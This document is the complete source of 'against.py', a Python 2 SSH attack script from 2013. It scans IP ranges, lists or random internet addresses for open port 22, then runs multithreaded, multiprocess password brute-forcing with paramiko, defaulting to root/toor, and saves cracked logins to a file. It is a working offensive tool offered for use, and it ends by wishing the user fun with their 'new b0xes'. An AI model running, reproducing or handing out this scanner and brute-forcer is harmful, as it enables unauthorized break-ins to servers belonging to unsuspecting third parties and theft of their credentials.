Against is a very fast ssh attack script which includes a multithreaded port scanning module (tcp connect) for discovering possible targets and a multithreaded brute-forcing module which attacks in parallel (multiprocessing) all discovered hosts or given ip addresses from a list.
a381147676345ca9c836e4c1462e3640dcacda8fa9c672bb180705d90835376b
#!/usr/bin/env python
# -*- coding: latin-1 -*- ######################################################
# ____ _ __ #
# ___ __ __/ / /__ ___ ______ ______(_) /___ __ #
# / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
# /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / #
# /___/ team #
# #
# against.py - mass scanning and brute-forcing script for ssh #
# #
# FILE #
# against.py #
# #
# DATE #
# 2013-06-25 #
# #
# DESCRIPTION #
# 'against.py' is a very fast ssh attacking script which includes a #
# multithreaded port scanning module (tcp connect) for discovering possible #
# targets and a multithreaded brute-forcing module which attacks #
# parallel (multiprocessing) all discovered hosts or given ip-adresses #
# from a list. #
# #
# AUTHOR #
# pigtail23 aka pgt #
# #
################################################################################
from socket import *
import multiprocessing
import threading
import time
import paramiko
import sys
import os
import logging
import argparse
import random
# print our nice banner ;)
def banner():
print '--==[ against.py by pigtail23@nullsecurity.net ]==--'
# print version
def version():
print '[+] against.py v0.1'
exit(0)
# checks if we can write to file which was given by parameter -o
def test_file(filename):
try:
outfile = open(filename, 'a')
outfile.close()
except:
print '[-] ERROR: Cannot write to file \'%s\'' % filename
exit(1)
# defines the command line parameter and help page
def argspage():
parser = argparse.ArgumentParser(
usage='\n\n ./%(prog)s -i <arg> | -r <arg> | -I <arg>',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=
'examples:\n\n' \
' scanning and attacking random ips\n' \
' usage: ./%(prog)s -r 50 -L password.txt\n\n' \
' scanning and attacking an ip-range\n' \
' usage: ./%(prog)s -i 192.168.0.1-254 -u admin -l troll\n\n' \
' attack ips from file\n' \
' usage: ./%(prog)s -I ips.txt -L passwords.txt\n',
add_help=False
)
options = parser.add_argument_group('options', '')
options.add_argument('-i', default=False, metavar='<ip/range>',
help='ip-address/-range (e.g.: 192.168.0-3.1-254)')
options.add_argument('-I', default=False, metavar='<file>',
help='list of target ip-addresses')
options.add_argument('-r', default=False, metavar='<num>',
help='attack random hosts')
options.add_argument('-p', default=22, metavar='<num>',
help='port number of sshd (default: 22)')
options.add_argument('-t', default=4, metavar='<num>',
help='threads per host (default: 4)')
options.add_argument('-f', default=8, metavar='<num>',
help='attack max hosts parallel (default: 8)')
options.add_argument('-u', default='root', metavar='<username>',
help='single username (default: root)')
options.add_argument('-U', default=False, metavar='<file>',
help='list of usernames')
options.add_argument('-l', default='toor', metavar='<password>',
help='single password (default: toor)')
options.add_argument('-L', default=False, metavar='<file>',
help='list of passwords')
options.add_argument('-o', default=False, metavar='<file>',
help='write found logins to file')
options.add_argument('-T', default=3, metavar='<sec>',
help='timeout in seconds (default: 3)')
options.add_argument('-V', action='store_true',
help='print version of against.py and exit')
args = parser.parse_args()
if args.V:
version()
if (args.i == False) and (args.I == False) and (args.r == False):
print ''
parser.print_help()
exit(0)
return args
# connect to target and checks for an open port
def scan(target, port, timeout):
s = socket(AF_INET, SOCK_STREAM)
s.settimeout(timeout)
result = s.connect_ex((target, port))
s.close()
if result == 0:
HOSTLIST.append(target)
# creates 'x' numbers of threads and call scan()
def thread_scan(args, target):
port = int(args.p)
to = float(args.T)
bam = threading.Thread(target=scan, args=(target, port, to,))
bam.start()
# scanning with up to 200 threads for targets with open port
while threading.activeCount() > 200:
time.sleep(0.0001)
time.sleep(0.0001)
# only the output when scanning for targets
def scan_output(i):
sys.stdout.flush()
sys.stdout.write('\r[*] hosts scanned: {0} | ' \
'possible to attack: {1}'.format(i, len(HOSTLIST)))
# creates single ips by a given ip-range - parameter -i
def ip_range(args):
targets = args.i
a = tuple(part for part in targets.split('.'))
rsa = (range(4))
rsb = (range(4))
for i in range(0,4):
ga = a[i].find('-')
if ga != -1:
rsa[i] = int(a[i][:ga])
rsb[i] = int(a[i][1+ga:]) + 1
else:
rsa[i] = int(a[i])
rsb[i] = int(a[i]) + 1
print '[*] scanning %s for ssh services' % targets
m = 0
for i in range (rsa[0], rsb[0]):
for j in range (rsa[1], rsb[1]):
for k in range (rsa[2], rsb[2]):
for l in range(rsa[3], rsb[3]):
target = '%d.%d.%d.%d' % (i, j, k, l)
m += 1
scan_output(m)
thread_scan(args, target)
# waiting for the last running threads
while threading.activeCount() > 1:
time.sleep(0.1)
scan_output(m)
print '\n[*] finished scan.'
# only refactor stuff
def rand():
return random.randrange(0,256)
# creates random ips
def rand_ip(args):
i = 0
print '[*] scanning random ips for ssh services'
while len(HOSTLIST) < int(args.r):
target = '%d.%d.%d.%d' % (rand(), rand(), rand(), rand())
i += 1
scan_output(i)
thread_scan(args, target)
# waiting for the last running threads
while threading.activeCount() > 1:
time.sleep(0.1)
scan_output(i)
print '\n[*] finished scan.'
# checks if given filename by parameter exists
def file_exists(filename):
try:
open(filename).readlines()
except IOError:
print '[-] ERROR: cannot open file \'%s\'' % filename
exit(1)
# read-in a file with ips
def ip_list(ipfile):
file_exists(ipfile)
hosts = open(ipfile).readlines()
for host in hosts:
HOSTLIST.append(host)
# write all found logins to file - parameter -o
def write_logins(filename, login):
outfile = open(filename, 'a')
outfile.write(login)
outfile.close()
# connect to target and try to login
def crack(target, prt, user, passw, outfile, to, i):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
user = user.replace('\n', '')
passw = passw.replace('\n', '')
try:
ssh.connect(target, port=prt, username=user, password=passw, timeout=to)
#ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command('uname -a')
#print ssh_stdout
login = '[+] login found for %s | %s:%s' % (target, user, passw)
print login
if outfile:
write_logins(outfile, login + '\n')
ssh.close()
os._exit(0)
except paramiko.AuthenticationException:
ssh.close()
except:
ssh.close()
# after 8 timeouts per request the attack against $target will stopped
if i < 8:
i += 1
# reconnect after random seconds (between 0.2 and 0.5 sec)
ra = random.uniform(0.2, 0.6)
time.sleep(ra)
crack(target, prt, user, passw, outfile, to, i)
else:
print '[-] too much timeouts - stopped attack against %s' % (target)
os._exit(1)
# creates 'x' number of threads and call crack()
def thread_it(target, args):
port = int(args.p)
user = args.u
userlist = args.U
password = args.l
passlist = args.L
outfile = args.o
to = float(args.T)
threads = int(args.t)
if userlist:
user = open(userlist).readlines()
else:
user = [ user ]
if passlist:
password = open(passlist).readlines()
else:
password = [ password ]
# looks dirty but we need it :/
try:
for us in user:
for pw in password:
Run = threading.Thread(target=crack, args=(target, port, us, pw,
outfile, to, 0,))
Run.start()
# checks that we a max number of threads
while threading.activeCount() > threads:
time.sleep(0.01)
time.sleep(0.001)
# waiting for the last running threads
while threading.activeCount() > 1:
time.sleep(0.1)
except KeyboardInterrupt:
os._exit(1)
# create 'x' child processes (child == cracking routine for only one target)
def fork_it(args):
threads = int(args.t)
childs = int(args.f)
len_hosts = len(HOSTLIST)
print '[*] attacking %d target(s)\n' \
'[*] cracking up to %d hosts parallel\n' \
'[*] threads per host: %d' % (len_hosts, childs, threads)
i = 1
for host in HOSTLIST:
host = host.replace('\n', '')
print '[*] performing attacks against %s [%d/%d]' % (host, i, len_hosts)
hostfork = multiprocessing.Process(target=thread_it,
args=(host, args))
hostfork.start()
# checks that we have a max number of childs
while len(multiprocessing.active_children()) >= childs:
time.sleep(0.001)
time.sleep(0.001)
i += 1
# waiting for the last running childs
while multiprocessing.active_children():
time.sleep(1)
def empty_hostlist():
if len(HOSTLIST) == 0:
print '[-] found no targets to attack!'
exit(1)
# output when against.py finished all routines
def finished():
print '[*] game over!!! have fun with your new b0xes!'
def main():
banner()
args = argspage()
if args.U:
file_exists(args.U)
if args.L:
file_exists(args.L)
if args.o:
test_file(args.o)
if args.i:
ip_range(args)
elif args.I:
ip_list(args.I)
else:
rand_ip(args)
time.sleep(0.1)
empty_hostlist()
fork_it(args)
finished()
if __name__ == '__main__':
HOSTLIST = []
try:
logging.disable(logging.CRITICAL)
main()
except KeyboardInterrupt:
print '\nbye bye!!!'
time.sleep(0.2)
os._exit(1)